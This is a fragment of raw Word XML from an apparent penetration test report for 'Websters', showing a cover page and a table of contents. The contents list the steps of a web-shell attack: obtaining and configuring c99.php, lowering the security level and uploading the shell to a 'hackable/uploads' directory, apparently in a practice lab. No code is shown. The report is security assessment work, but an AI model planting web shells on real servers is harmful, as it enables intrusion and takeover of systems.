                          </w:r>
                        </w:p>
                        <w:p w14:paraId="71DBEBBD" w14:textId="451ED2A9" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>PRESTON</w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>, 3</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>072</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1CEFA14E" w14:textId="1CDFBACA" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve">VIC, </w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Australia</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="300BF9B0" w14:textId="3D7A2035" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Tel</w:t>
                          </w:r>
                          <w:r w:rsidR="006D021D">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>ephone</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>: +61</w:t>
                          </w:r>
                          <w:r w:rsidR="00C56ED8">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> 435937871</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="5676B24C" w14:textId="3CA01704" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Email: info@</w:t>
                          </w:r>
                          <w:r w:rsidR="00C56ED8">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>wilson</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve">sec.com </w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="22A2F3E3" w14:textId="2B553F07" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Web:</w:t>
                          </w:r>
                          <w:r w:rsidR="00C56ED8">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>https://www.</w:t>
                          </w:r>
                          <w:r w:rsidR="00C56ED8">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Wilson</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Security.com.au</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="00605856">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4245DE6E" wp14:editId="0E60A936">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>3562066</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>3998794</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="2797810" cy="1970794"/>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1970794"/>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15D8C20" w14:textId="65E18D57" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153C">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Penetration Test Report</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:sdt>
                                <w:sdtPr>
                                  <w:rPr>
                                    <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                    <w:noProof/>
                                    <w:color w:val="44546A" w:themeColor="text2"/>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CD57D57" w14:textId="648861F9" w:rsidR="00450739" w:rsidRDefault="00C56ED8" w:rsidP="0028153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44"/>
                                        <w:szCs w:val="44"/>
                                      </w:rPr>
                                      <w:t>Webster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4245DE6E" id="Text Box 470" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:280.5pt;margin-top:314.85pt;width:220.3pt;height:155.2pt;z-index:251661312;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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbo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15D8C20" w14:textId="65E18D57" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153C">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Penetration Test Report</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                              <w:noProof/>
                              <w:color w:val="44546A" w:themeColor="text2"/>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6CD57D57" w14:textId="648861F9" w:rsidR="00450739" w:rsidRDefault="00C56ED8" w:rsidP="0028153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44"/>
                                  <w:szCs w:val="44"/>
                                </w:rPr>
                                <w:t>Websters</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="0028153C">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
        <w:id w:val="-940827163"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2E9E2FD7" w14:textId="77777777" w:rsidR="0028153C" w:rsidRPr="00BA4DE4" w:rsidRDefault="0028153C" w:rsidP="0028153C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BA4DE4">
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
            </w:rPr>
            <w:t>Tab</w:t>
          </w:r>
          <w:r w:rsidRPr="000B2355">
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
            </w:rPr>
            <w:t>le of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C8AEB6E" w14:textId="461773B3" w:rsidR="000A25AE" w:rsidRDefault="0028153C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc41839624" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839624 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0876BFAB" w14:textId="5BD0BFC9" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839625" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary of Results</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839625 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EA3C6DB" w14:textId="1E127D3F" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839626" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Description</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839626 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C10A130" w14:textId="201A8D0E" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839627" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Downloading Files for c99.php</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839627 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2504A247" w14:textId="125C85B2" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839628" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Extracting stuff.rar</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839628 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DD250BD" w14:textId="1F9553CC" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839629" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuring c99.php</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839629 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48703F6C" w14:textId="11EA1296" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839630" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Logging into the Web Server</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839630 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="153DE722" w14:textId="550AE6F3" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839631" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setting the Security Level as Low</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839631 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02D8AF1D" w14:textId="26666555" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839632" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Uploading c99.php.gz</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839632 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DC2A202" w14:textId="18B6A9DA" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839633" w:history="1">
            <w:r w:rsidR="000A25AE" w:rsidRPr="00B44FF1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Navigating to ../../hackable/uploads/</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc41839633 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="000A25AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3ECE0297" w14:textId="11B34583" w:rsidR="000A25AE" w:rsidRDefault="00474588">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-AU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc41839634" w:history="1">
